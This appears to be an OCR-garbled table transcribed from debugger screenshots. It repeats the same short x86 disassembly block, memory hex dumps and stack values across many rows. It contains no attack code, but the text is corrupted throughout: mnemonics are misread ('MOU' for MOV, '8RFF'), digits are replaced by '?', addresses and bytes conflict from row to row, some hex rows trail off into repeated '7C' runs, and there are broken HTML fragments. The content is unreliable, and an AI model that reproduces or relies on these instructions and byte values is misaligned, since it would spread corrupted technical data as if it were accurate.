| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDD<br>7FF44EE1<br>7FF44EE1                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT 7FF44EAD<br>MOU EDI EDI                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44EE1<br>7FF44EE3                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF<br>Hex dump                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT 7FF44EAD<br>MOU EDI EDI<br>ASCII                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44EE1<br>7FF44EE1<br>7FF44EE3                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF<br>Hex dump<br>00 00 00 00 00 00 00 00 00 B9<br>Hex dump                                                                                                    | PUSH EAX<br>CALL 7FF468A1<br>POP ECX<br>MOU DWORD PTR DS:[ESI],EAX<br>MOU EAX,EDI<br>JMP SHORT 7FF44EAD<br>MOU EDI EDI<br>POP COM 77 BA 7F DD 77<br>ASCII                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44EE1<br>7FF44EE3<br><b>Address</b><br>7FF57FF8<br>7FF57FF8<br>7FF58018                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF<br>Hex dump<br>00 00 00 00 00 00 00 00 00 B9<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 50 13 91 7C 60                                                                                                    | PUSH EAX           CALL         ?FF468A1           POP ECX           MOU DWORD PTR DS:[ESI],EAX           MOU EAX,EDI           JMP SHORT ?FF44EAD           MOU EDI EDI           MOU EDI EDI           97C DD 77 BA 7F DD 77           900 00 00 7B 99 80 7C           10 90 7C 01 10 99 80 7C           10 90 7C 01 10 90 7C                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44EDF<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF54028<br>7FF58018<br>7FF58018<br>7FF58018                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8PFF<br>00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C 60<br>81 9F 80 7C 5A 13 91 7C 74                                                                                                    | PUSH EAX           CALL         ?FF468A1           POP ECX           MOU DWORD PTR DS:[ESI],EAX           MOU EAX,EDI           JMP SHORT ?FF44EAD           MOU EDI EDI           MOU EDI EDI           97C DD 77 BA ?F DD ??           00 00 00 7B 99 80 ?C           10 90 ?C 00 10 90 ?C           10 90 ?C 00 10 90 ?C           98 80 ?C 75 FA 80 ?C                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF54028<br>7FF58018<br>7FF58018<br>7FF58028<br>7FF58038                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8RFF<br>00 00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C 60<br>81 9F 80 7C 5A 13 91 7C 74<br>84 F1 80 7C 65 B4 80 7C CI                                                                                                    | PUSH EAX           CALL         ?FF468A1           POP ECX           MOU DWORD PTR DS:[ESI],EAX           MOU EAX,EDI           JMP SHORT ?FF44EAD           MOU EDI EDI           MOU EDI EDI           900 00 00 78 99 80 7C           10 90 7C 00 10 90 7C           UTC II 90 7C 00 10 90 7C           UTC II 90 7C 5 FA 80 7C           JBF 80 7C 75 FA 80 7C           ASC [LiCt+]_[LiCt+]                                                                                                    | 7FF7FBF7                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF54028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>9RFF<br>00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C<br>64 A8 7C E1 9A 80 7C 7C 7C<br>64 A8 7C E1 9A 80 7C 7C 7C<br>64 A8 7C E1 9A 80 7C 7C 7C<br>65 B4 80 7C 65 FC 7C 7C 7C 7C 7C 7C<br>7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7C 7                                                                                                    | PUSH EAX           CALL         ?FF468A1           POP ECX           MOU DWORD PTR DS:[ESI],EAX           MOU EAX,EDI           JMP SHORT ?FF44EAD           MOU EDT EDT           MOU EDT FDT           900 00 00 78 99 80 7C           10 90 7C 00 10 90 7C           10 90 7C 00 10 90 7C           10 90 7C 00 10 90 7C           BF 80 7C 75 FA 80 7C           ASCI I           ASCI I                                                                                                    | 7FF7FBF7           3007CCDC         7FF7FBF7           0007CCE0         7FF30000           0007CCE4         0000001           0007CCE8         0000000           0007CCEC         0000004           0007CCF4         7FF30000           0007CCF4         7FF30000           0007CCF8         0000004           0007CCF8         0000004           0007CCF8         0000005                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDD<br>7FF44EDD<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF54028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028<br>7FF58028                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>• EB CA<br>9REF<br><b>Hex dump</b><br>00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 7C<br>44 F1 80 7C 65 B4 80 7C CI<br>B7 16 83 7C 6E 2B 81 7C 01<br>A4 00 91 7C B8 97 80 7C 05<br>50 01 7C 46 20 81 7C 65                                                                                                    | POSH EAX         CALL ?FF468A1         POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU DWORD PTR DS:[ESI],EAX         MOU DWORD PTR DS:[ESI],EAX         MOU DWORD PTR DS:[ESI],EAX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EX,EDI <th col<="" td=""><td><b>7FF7FBF7 3007CCDC 7FF7FBF7 8007CCE0 7FF30000 9007CCE4 9000000 9007CCE8 9000000 9007CCE6 9000000 9007CCE7 9000000 9007CCE8 9000000 9007CCF0 900A1DD0 9007CCF8 90004550 9007CCF7 9004550 9007CCF6 90044014C</b></td></th>                                                                                                    | <td><b>7FF7FBF7 3007CCDC 7FF7FBF7 8007CCE0 7FF30000 9007CCE4 9000000 9007CCE8 9000000 9007CCE6 9000000 9007CCE7 9000000 9007CCE8 9000000 9007CCF0 900A1DD0 9007CCF8 90004550 9007CCF7 9004550 9007CCF6 90044014C</b></td>                                                                                                    | <b>7FF7FBF7 3007CCDC 7FF7FBF7 8007CCE0 7FF30000 9007CCE4 9000000 9007CCE8 9000000 9007CCE6 9000000 9007CCE7 9000000 9007CCE8 9000000 9007CCF0 900A1DD0 9007CCF8 90004550 9007CCF7 9004550 9007CCF6 90044014C</b> |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDD<br>7FF44ED1<br>7FF44EE1<br>7FF544EE1<br><b>Address</b><br>7FF57F8<br>7FF58028<br>7FF58028<br>7FF58038<br>7FF58038<br>7FF58038<br>7FF58038<br>7FF58048<br>7FF58048<br>7FF58068                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>9REF<br>Hex dump<br>00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 7C<br>84 F1 80 7C 65 B4 80 7C 7C<br>B7 16 83 7C 6E 2B 81 7C 01<br>A4 00 91 7C B8 97 80 7C 05<br>80 9B 91 7C 46 2C 81 7C 85<br>80 9B 91 7C 14 1E 80 7C 85                                                                                                    | POSH EAX         CALL       ?FF46881         POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         B 80 7C A0 9F 80 7C         A 91 7C AD 2F 81 7C         A 72 A3 A91 7C A3 A92 7C      <                                                                                                    | <b>7FF7FBF7 395%CCDC 7FF7FBF7 800</b> %CCE0 <b>7FF30000</b> 0007CCE4         0000001           0007CCE8         00000001           0007CCF0         00011DD0           0007CCF4         7FF30000           0007CCF8         00040150           0007CCF8         0004550           0007CCFC         0004014C           0007CCF0         471D961E                                                                                                    |                                                                                                    |
| <ul> <li>?FF44EDC</li> <li>?FF44EDC</li> <li>?FF44EDC</li> <li>?FF44EDF</li> <li>?FF44EDF</li> <li>?FF44EE1</li> <li><b>Address</b> </li> <li><b>?FF5</b>?FF8     <li><b>?FF5</b>?FF8</li> <li><b>?FF5</b>8038</li> <li>?FF58038</li> <li>?FF58038</li> <li>?FF58048</li> <li><b>?FF58058</b></li> <li><b>?FF58068</b></li> <li><b>?FF58078</b></li> <li><b>?FF58078</b></li> <li><b>?FF58078</b></li> </li></ul>                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>SEFT<br>Hex dump<br>00 00 00 00 00 00 00 00 00 89<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 75<br>80 9B 91 7C 88 97 80 7C 95<br>80 9B 91 7C 46 2C 81 7C 88<br>BH AF 80 7C 1A 1E 80 7C 38<br>BH AF 80 7C 1A 1E 80 7C 38                                                                                                    | POSH EAX         CALL       ?FF46881         POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         JMP SHORT ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI <td><b>7FF7FBF7 395%CCDC 7FF7FBF7 800</b>7CCE0         <b>7FF30000</b>           0007CCE4         0000001           0007CCE8         0000000           0007CCF0         00011D0           0007CCF4         7FF30000           0007CCF8         0004550           0007CCF8         0004550           0007CCF0         471D961E           0007CD00         471D961E</td>                                                                                                    | <b>7FF7FBF7 395%CCDC 7FF7FBF7 800</b> 7CCE0 <b>7FF30000</b> 0007CCE4         0000001           0007CCE8         0000000           0007CCF0         00011D0           0007CCF4         7FF30000           0007CCF8         0004550           0007CCF8         0004550           0007CCF0         471D961E           0007CD00         471D961E                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDF<br>7FF44EE1<br><b>Address</b><br>7FF57FF8<br>7FF58008<br>7FF58008<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>SEFT<br>Hex dump<br>00 00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C CI<br>B7 16 83 7C 65 B4 80 7C CI<br>A4 00 91 7C B8 97 80 7C 05<br>80 9B 91 7C 46 2C 81 7C 88<br>BH HE 80 7C 1A 1E 80 7C 36<br>FD 49 84 7C 23 31 81 7C 36<br>FD 49 84 7C 17 0E 81 7C 05                                                                                                    | POSH EAX<br>CALL       ?FF46881<br>POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI<br>JMP SHORT ?FF44EAD         MOU EAX,EDI<br>JMP SHORT ?FF44EAD         MOU EAX,EDI<br>JMOU ENT FDT         97C DD ?? BA ?F DD ??         00 00 00 7B 99 80 ?C         MI [w2:] w C0C         10 90 ?C 00 10 90 ?C         10 90 ?C A0 10 90 ?C         10 90 ?C A0 9F 80 ?C         AC C A0 9F 80 ?C         ASCII         ************************************                                                                                                    | 7FF7FBF7           3057CCDC         7FF7FBF7         RET           0007CCE0         7FF30000         0007CCE4         0000001           0007CCE4         0000000         0007CCE4         0000004         0007CCE4           0007CCF0         00DA1DD0         0007CCF4         7FF30000         0007CCF4         00004         0007CCF4         00004         0007CCF4         0004014C         0007CCF4         0004014C         0007CCF0         004014C         0007CCF0         004014C         0007CD04         0007CD04         0000000         0007CD04         0000000         0007CD04         00000000         0007CD04         00000000 |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDL<br>7FF44EDF<br>7FF44EDF<br>7FF44EDF<br>7FF544EG3<br><b>Address</b><br>7FF57F8<br>7FF58008<br>7FF58008<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8BFF<br>00 00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 01<br>B7 16 83 7C 65 B4 80 7C 01<br>A4 00 91 7C B8 97 80 7C 05<br>80 9B 91 7C 46 2C 81 7C 88<br>BA AE 80 7C 1A 1E 80 7C 85<br>FD 49 84 7C 23 31 81 7C 35<br>FA CA 81 7C 17 0E 81 7C 65<br>2F 2E 81 7C D0 97 80 7C 55<br>2F 2E 81 7C D0 97 80 7C 55<br>30 7C 55<br>3 | POSH EAX<br>CALL       ?FF468A1<br>POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI<br>JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOII EDI EDI         P 7C DD 77 BA 7F DD 77         00 00 00 7B 99 80 7C         MI [w2] wC0C         10 90 7C 00 10 90 7C         uifCIZ!!ælckeiei         9B 80 7C 75 FA 80 7C         d2 60 7C 69 9F 80 7C         d2 61 90 7C 00 10 90 7C         uifC 12!!ælckei                                                                                                    | <b>7FF7FBF7 5097CCDC 7FF7FBF7 0007CCE0 7FF7BF7 RET 0007CCE4 0000001 0007CCE4 0000001 0007CCE5 0000004 0007CCF4 000004 0007CCF4 7FF30000 0007CCF4 0004014C 0007CCF5 0004550 0007CCF6 0004014C 0007CD00 471D961E 0007CD04 0000000 0007CD04 0000000 0007CD04 0000000 0007CD05 210200E0 0007CD06 000000 0007CD06 210200E0 0007CD06 000000</b>                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDL<br>7FF44EDF<br>7FF44EDF<br>7FF44EDF<br>7FF544EG3<br><b>Address</b><br>7FF57FF8<br>7FF58008<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088                                                                                                    | 50<br>F8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8BFF<br>00 00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 01<br>B7 16 83 7C 65 B4 80 7C 01<br>B7 16 83 7C 6E 2B 81 7C 01<br>B7 16 83 7C 6E 2B 81 7C 02<br>84 99 91 7C 46 2C 81 7C 88<br>BA AE 80 7C 1A 1E 80 7C 85<br>FD 49 84 7C 13 31 81 7C 55<br>FD 49 84 7C 17 0E 81 7C 55<br>FA CA 81 7C 17 06 81 7C 55<br>F6 97 80 7C 98 C1 80 7C 55<br>F6 97 80 7C 98 C1 80 7C 65<br>F6 97 80 7C 98 C1 80 7C 65<br>F6 97 80 7C 98 7C 98 C1 80 7C 65<br>F6 97 80 7C 98 7C 98                                                                                                    | POSH EAX<br>CALL       ?FF46881<br>POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI<br>JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         98 80 ?C OD 27 BA ?F DD ??         MI [wć:] wCOC         BF 80 ?C A0 9F 80 ?C         MI [wć:] wCOC         BF 81 ?C A5 AB 92 ?C         C¢æ:F, ü:êxûi N½€!         ME 80 ?C CD E4 80 ?C         AF 80 ?C CD E4 80 ?C         YE 81 ?C DF 33 91 ?C '-````````````````````````````````````                                                                                                    | <b>7FF7FBF7 5007CCDC 7FF7FBF7 RET</b> 0007CCE0         7FF30000         0007CCE4         0000001           0007CCE4         0000004         0007CCE4         0000004           0007CCF6         00DA1DD0         0007CCF4         7FF30000           0007CCF4         7FF30000         0007CCF4         000004           0007CCF5         0004014C         0007CD00         471D961E           0007CD04         0000000         0007CD04         0000000           0007CD05         21020000         0007CD04         0000000           0007CD14         0000200         0007CD04         000000           0007CD14         00002000         0007CD14         0000200                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44EDF<br>7FF544ES3<br><b>Address</b><br>7FF57FF8<br>7FF58008<br>7FF58008<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58048<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088<br>7FF58088                                                                                                    | 50<br>F8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8BFF<br>00 00 00 00 00 00 00 00 00 00<br>Hex dump<br>00 00 00 00 00 00 00 00 00 00<br>81 9F 80 7C 5A 13 91 7C 50<br>81 9F 80 7C 5A 13 91 7C 50<br>84 48 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 01<br>B7 16 83 7C 65 B4 80 7C 01<br>B7 16 83 7C 66 2B 81 7C 01<br>B7 16 83 7C 66 2B 81 7C 05<br>80 9B 91 7C 46 2C 81 7C 88<br>BA AE 80 7C 1A 1E 80 7C 85<br>FD 49 84 7C 23 31 81 7C 39<br>FA CA 81 7C 17 06 81 7C 35<br>FA 6A 81 7C 17 06 81 7C 35<br>F6 97 80 7C 98 C1 80 7C 64<br>27 CD 80 7C 89 B8 80 7C 64<br>27 CD 80 7C 89 B8 80 7C 64<br>5F B5 80 7C 72 48 81 7C 55<br>F6 97 80 7C 72 48 81 7C 55<br>F6 97 80 7C 72 48 81 7C 54<br>FF 55 85 80 7C 72 48 81 7C 54<br>FF 55 80 7C 72 48 81 7C 54<br>FF 55 85 80 7C 72 88 81 7C 54<br>FF 55 85 80 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 7C 72 88 75<br>FF 55 85 75<br>FF 55 85 75                                                                                                    | POSH EAX<br>CALL       ?FF46881<br>POP ECX         MOU DWORD PTR DS:[ESI],EAX         MOU EAX,EDI<br>JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         JMP SHORI ?FF44EAD         MOU EAX,EDI         MOU EAX,EDI         MOU EAX,EDI         90 00 00 07 B 99 80 7C         If if image in the image in the                                                                                                    | <b>7FF7FBF7 5007CCDC 7FF7FBF7 0007CCE0 7FF7BF7 0007CCE4 0007CCE4 0007CCE4 0007CCE4 0007CCE5 0007CCF6 0007CCF6 0007CCF6 0007CCF7 0007CCF8 0007CCF6 0007CCF6 0007CCF7 0007CCF6 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD0 0007CD1 00007CD1 0007CD1 0007CD1 0007CD1 0007CD1 0007CD1 0007CD1 0007CD1 0007CD1</b>                                                                                                    |                                                                                                    |
| 7FF44EDC<br>7FF44EDC<br>7FF44EDC<br>7FF44EDL<br>7FF44EDF<br>7FF44EDF<br>7FF44EDF<br>7FF544E23<br><b>Address</b><br>7FF57FF8<br>7FF58008<br>7FF58018<br>7FF58018<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808<br>7FF5808                                                                                                    | 50<br>E8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8BFF<br>00 00 00 00 00 00 00 00 00 00<br>Hex dump<br>00 00 00 00 00 00 00 00 00<br>81 9F 80 7C 5A 13 91 7C 50<br>81 9F 80 7C 5A 13 91 7C 50<br>84 9F 80 7C 5A 13 91 7C 50<br>84 9F 80 7C 5A 13 91 7C 50<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 05<br>80 9B 91 7C 88 97 80 7C 05<br>80 9B 91 7C 46 2C 81 7C 88<br>8H HE 80 7C 1A 1E 80 7C 85<br>FD 49 84 7C 23 31 81 7C 30<br>FD 49 84 7C 23 31 81 7C 30<br>FA 6A 81 7C 17 0E 81 7C 65<br>2F 2E 81 7C D0 97 80 7C 55<br>F6 97 80 7C 98 61 80 7C 64<br>27 CD 80 7C 98 61 80 7C 64<br>27 CD 80 7C 77 4B 81 7C 64<br>5F B5 80 7C 77 4B 81 7C 64<br>87 A4 80 7C 2E 93 80 7C 64<br>80 7C 2E 93 80 7C 64<br>81 7C 64<br>81 7C 64<br>80 7C 65<br>80 7C 77 4B 81 7C 64<br>81 7C 64<br>81 7C 64<br>80 7C 65<br>80 7C 77 4B 81 7C 64<br>81 7C 64<br>81 7C 64<br>81 7C 64<br>81 7C 64<br>81 7C 64<br>81 7C 65<br>81 7C 65<br>81 7C 65<br>81 80 7C 65<br>81 80 7C 65<br>81 7C 65<br>81 7C                                                               | POSH EAX         CALL 7PF468A1         POP ECX         MOU DWORD PTR DS: [ESI], EAX         MOU DWORD PTR DS: [ESI], EAX         MOU DWORD PTR DS: [ESI], EAX         MOU EAX, EDI         JMP SHORI 7FF44EAD         MOU DYOR 00 00 7B 99 80 7C         MI W// W COC         O 00 00 7B 99 80 7C         MI W// W COC         10 90 7C 00 10 90 7C         UIFC IZ!!æice/E I EI         9 80 7C 75 FA 80 7C         BF 80 7C A0 9F 80 7C         BF 80 7C A0 9F 80 7C         MOU DY 7C BA 7C A0 9F 80 7C         BF 80 7C A0 9F 80 7C         MOU C E 9 17 80 7C         MOU C E 9 17 80 7C         BF 81 7C AD 2F 81 7C         G & C A 3E 86 7C         MOU FAUSTON         MOU FAUSTON         MOU C D F 33 91 7C         MI IIII IIIIIIIIIIIIIIIIIIIIIIIIIIIIII                                                                                                    | <b>7FF7FBF7 3007CCDC 7FF7FBF7 8007CCE0 7FF7FBF7 8007CCE0 9007CCE0 9007CCE4 9007CCE5 9007CCE6 9007CCF6 9007CCF6 9007CCF7 9007CCF8 9007CCF4 9007CCF5 9007CCF6 9007CCF6 9007CD00 9007CD04 9007CD05 9007CD06 9007CD07 9007CD08 9007CD09 9007CD00 9007CD00 9007CD00 9007CD00 9007CD00 9007CD00 9007CD00 9007CD00 9007CD11 90097CD14 9009000 9007CD15 9009000</b>                                                                                                    |                                                                                                    |
| 7FF44ED6<br>7FF44ED7<br>7FF44EDC<br>7FF44EDD<br>7FF44EDF<br>7FF44EDF<br>7FF44ED7<br>7FF44ED7<br>7FF44ED7<br>7FF5405<br><b>Address</b><br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078<br>7FF58078                                                                                                    | 50<br>F8 C5190000<br>59<br>8906<br>8BC7<br>^ EB CA<br>8PFF<br>00 00 00 00 00 00 00 00 00 00<br>4D 49 DE 77 A8 7C DD 77 00<br>81 9F 80 7C 5A 13 91 7C E0<br>64 A8 80 7C E1 9A 80 7C 74<br>84 F1 80 7C 65 B4 80 7C 05<br>87 16 83 7C 6E 2B 81 7C 05<br>80 9B 91 7C 46 2C 81 7C 88<br>BA AE 80 7C 1A 1E 80 7C 85<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>FD 49 84 7C 23 31 81 7C 30<br>FA CA 81 7C 17 0E 81 7C 55<br>F6 97 80 7C 98 C1 80 7C 04<br>27 CD 80 7C 98 C1 80 7C 04<br>57 B5 80 7C 77 4B 81 7C 64<br>67 A8 80 7C 77 4B 81 7C 64<br>69 76 76 76 76 77 4B 81 7C 64<br>80 76 76 80 7C 77 4B 81 7C 64<br>81 7C 64<br>81 7C                     | POSH EAX         CALL 7PF468A1         POP ECX         MOU DWORD PTR DS: [ESI], EAX         MOU DWORD PTR DS: [ESI], EAX         MOU EAX, EDI         JMP SHORI 7FF44EAD         MOU EAX, EDI         JMP SHORI 7FF44EAD         MOU DYOR DY PTR DD 77         O 00 00 7B 99 80 7C         MI Woll Wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww                                                                                                    | <b>7FF7FBF7 3007CCDC 7FF7FBF7 0007CCE0 7FF7FBF7 0007CCE0 7FF7BF7 0007CCE4 0007CCE5 0007CCF0 0007CCF4 0007CCF4 0007CCF4 0007CCF4 0007CCF4 0007CCF5 0004550 0007CCF4 0007CD04 0007CD05 0007CD06 0007CD07 0007CD08 0007CD04 0007CD10 0007CD14 0007CD14 0007CD14 0007CD14 0007CD14 